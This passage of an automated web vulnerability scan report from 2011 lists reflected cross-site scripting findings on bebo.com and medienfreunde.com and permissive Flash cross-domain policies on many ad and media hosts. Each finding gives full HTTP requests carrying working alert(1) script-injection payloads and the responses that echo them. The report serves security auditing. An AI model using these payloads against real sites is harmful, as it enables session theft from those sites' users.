Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:12 GMT
Content-Length: 14520
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/siteb2d8f';5319fe373f/index20_script.js/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleR
...[SNIP]...

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6 was submitted in the REST URL parameter 2. This input was echoed as 123b5"><img src=a onerror=alert(1)>3788d604ea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 14823
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site123b5"><img src=a onerror=alert(1)>3788d604ea6-index20_script" >
...[SNIP]...

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 10a5d'><script>alert(1)</script>8dd8fd16174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Length: 14740
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script_js&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=nl'>
...[SNIP]...

2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac75'%3be425e5815a9 was submitted in the REST URL parameter 3. This input was echoed as cac75';e425e5815a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/site/index20_script.jscac75'%3be425e5815a9?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14122
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
UT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/site/index20_script.jscac75';e425e5815a9/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10 was submitted in the REST URL parameter 3. This input was echoed as 694e4"><img src=a onerror=alert(1)>c97eeae1d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14278
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-694e4"><img src=a onerror=alert(1)>c97eeae1d10" >
...[SNIP]...

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab was submitted in the REST URL parameter 3. This input was echoed as ee94a<img src=a onerror=alert(1)>dae524548ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/index20_script.jsee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:20 GMT
Content-Length: 14366
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: index20_script.jsee94a<img src=a onerror=alert(1)>dae524548ab.</div>
...[SNIP]...

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 810dd'><script>alert(1)</script>9bdaf6f52b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site/index20_script.js810dd'><script>alert(1)</script>9bdaf6f52b2?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14291
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site/index20_script_js810dd'><script>alert(1)</script>9bdaf6f52b2&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=fr'>
...[SNIP]...

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bc"><script>alert(1)</script>80bc0e527c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dc0bc"><script>alert(1)</script>80bc0e527c9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Leipzig&blogurl=dc0bc"><script>alert(1)</script>80bc0e527c9&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

3. Flash cross-domain policy
There are 13 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.2. http://adx.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://bp.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

3.4. http://core.insightexpressai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 06 Jul 2011 15:38:53 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

3.6. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://rs.gwallet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

3.8. http://bstats.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.9. http://cdn.stumble-upon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Wed, 06 Jul 2011 11:15:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

3.10. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:38 GMT
Date: Wed, 06 Jul 2011 11:54:38 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.11. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 06 Jul 2011 01:47:26 GMT
Expires: Thu, 07 Jul 2011 01:47:26 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 36459
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
